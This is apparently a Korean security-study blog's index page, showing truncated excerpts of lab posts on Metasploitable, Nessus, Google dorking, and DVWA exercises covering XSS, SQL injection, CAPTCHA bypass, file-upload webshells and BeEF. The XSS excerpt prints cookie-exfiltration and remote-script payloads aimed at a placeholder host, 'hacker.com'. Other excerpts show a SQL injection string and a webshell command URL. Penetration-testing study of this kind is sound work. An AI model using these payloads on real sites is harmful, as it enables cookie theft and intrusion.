2018. 7. 31.

[metasploitable] nmap, 메타스플로잇, 인터프리터

service postgresql start // postgresql 실행 msfdb init // db를 초기화 한다. msfconsole db_status // db가 잘 연결되어있는지 확인 할 수 있다. nessus 결과나, sparta, nmap 등을 통해 나온 결과를 통해 공격 취약점을 선별한다. db_nmap 192.168.56.107 -sV # vsftp 2.3.4 공격 위 결과 중 21번 포트에 vsftpd 2.3.4 가 동작 중인 것을 알 수 있다. vsftpd 2.3.4 버취약함이 존재하는지 확인하려면 search...

Continue reading

kali linux 에 nessus 설치

# nessus 설치 및 이용 https://www.tenable.com/downloads/nessus 에서 Nessus-7.1.2-debian6_amd64.deb 를 다운받는다. https://www.tenable.com/products/nessus-home 에서 activation code를 받아야 한다. 패키지를 푼다. dpkg -i Nessus-7.1.2 파일명 패키지를 풀고 /etc/init.d/nessus start https://localhost:8834 스니핑 실습 ** nessus 접속 패스워드를 분실 했을 때는 다음과 같이 수행한다. cd /opt/nessus/sbin ./nessuscli lsuser // id를 확인 할 수 있다 ./nessuscli chpasswd...

Continue reading

2018. 7. 30.

[웹 취약점] 정보 수집 (패시브 스캐닝 / 액티브스캐닝)

정보 수집은 패시브 스캐닝과 액티브 스캐닝 단계로 구분된다. 1) 패시브 스캐닝 패시브 스캐닝은 공개되어 있는 정보를 수집하는 것이다. * 구글 해킹 site naver.com -filetype pdf inurl 은 특정 문자열을 포함한 검색 결과를 찾을때 사용된다 inurl :admin 관리자 페이지를 검색할때 사용 inurl index.php id= intitle "index of" intitle "index of" pdf * whois/netcraft/whatweb whois  와 netcraft (http://searchdns.netcraft.com/)...

Continue reading

2018. 7. 26.

[Pentester Lab] 실습용 웹 사이트 구성

# 실습환경 구축 설치 파일 다운로드 https://www.pentesterlab.com/exercises/ From SQL Injection to shell 로 접근하여 ISO 파일을 다운로드 한다. SQL 인젝션 공격에서 시작하여 웹 사이트 호스트 쉘을 얻으내기까지 실습을 할 수 있다. 종류는 Linux 32bit로 변경 / 메모리 1GB / 네트워크 어댑터를 NAT가 아닌 호스트 전용 어댑터로 변경한다. 이렇게 만들게되면 사설 아이피를 할당받게 되어 내부에서만 접근가능하고 칼리 리눅스가 해당 웹사이트에...

Continue reading

[DVWA] XSS 공격

자바스크립트 공격시 사용될 수 있는 예시 1)원격지에서 쿠키 빼낼때 사용 <script>document.location='http://hacker.com/cookie?'+document.cookie</script> 2) 외부의 해커사이트에 올려둔 악성 스크립트를 실행 할 수 있다. <script src=http://hacker.com/bad.js></script> 1. Reflected XSS 공격 시나리오 (1) 사용자 쿠키를 빼내는 스크립트주소가 삽입된 피싱 메일을 피해자에게...

Continue reading

2018.07.26 메모 - 고민해 볼 것

1. 시나리오를 구성하여 방법론 구상 및 시연해보기 ex) 해커가 내부망까지 접근하는 방법론은 어떤게 있을까? ex) 유출되어서는 안되는 파일이 유출 되었을때, 어떻게 이 파일이 유출되었는지 확인하는가? 2. 리버스엔지니어링 숙련 3. 앱 취약점 점검 숙련 4. 퍼징은 무엇이고 어떤 종류가 있는가 5. 취약점 분석/모의해킹을 할 때 가장 내새울 수 있는 스킬 개발하기 6. iot 장비 취약점 점검 7...

Continue reading

2018. 7. 25.

[웹 취약점] BeEF 를 이용한 XSS 공격

XSS 취약점을 발견했다면, 이를 통해 어떤 공격을 수행할 것인가. 다양한 사례와 시나리오가 있을 수 있겠지만 BeEF 를 이용해보자.. 1) XSS 취약점 발견 2) beef 실행할때 나왔던 스크립트문을 취약한 포인트에 삽입한다. ex) http://localhost/dvwa/vulnerabilities/xss_r/?name=<script src="http://127.0.0.1:3000/hook.js"></script> 3) 스크립트가 실행되면 BeEF 의 detail 패널에서 (127.0.0.1:3000/ui/panel) ...

Continue reading

2018. 7. 23.

[DVWA] SQL 인젝션

실습 환경 : KALI + DVWA 1) low 정상적인 ID(1) 를 입력하면 위와 같이 사용자 정보가 출력된다. 그러나 특수문자 (') 를 입력하면 위와 같이 에러페이지가 노출된다. 위와 같이 입력받는 $id 값에 아무런 필터링을 수행하지 않기 때문에 에러를 반환하게 된다. 이는 SQL 쿼리문을 조작할 수 있다는 의미이다. (sql 은 # 이 주석 나머지는 -- 주석) 1' or '1'='1 을 입력하면 다른 사람의 정보를 확인 할 수 있다. [칼럼 갯수 알아내기] 1) union 이용 1'...

Continue reading

2018. 7. 22.

[DVWA] CAPTCHA 우회

실습 환경 : Kali + DVWA 시나리오 : 캡차가 있는 경우 서버에 요청을 할 때, 첫번째로 captcha 확인을 하고 확인이 완료가 되면 비밀번호가 전송 될 것이다. 그러나 이를 캡차 인증을 우회하고 비밀번호만 전달할 수 있다. 1) low step=1 로 캡차코드가 전송되고 그 이후 step=2로 인증요청을 한다. 만약 1은 무시하고 step=2에서 아래와 같이 요청을 하면 성공한다. ** render 탭 을 많이 사용하면 편리하다. medium 역시 같은 방법으로 변경 가능하다. ...

Continue reading

2018. 7. 20.

[DVWA] 파일 업로드 취약점 실습 / 대응방안

실습 환경 : kali + DVWA 1) LOW 웹쉘 파일 다운로드 https://github.com/SecuAcademy/webhacking/blob/master/webshell.php  http://127.0.0.1/dvwa/hackable/uploads/webshell.php?cmd=ls+-al 아무런 대응 방법이 없어서 웹셀업로드 및 실행이 간단히 실행되는 것을 알 수 있다. 2) medium 버프스위트로 잡아준다음 Content type 의 값을 image/jpeg 로 바꿔서...

Continue reading

Popular Posts

Recent Posts

Blog Archive

Powered by Blogger.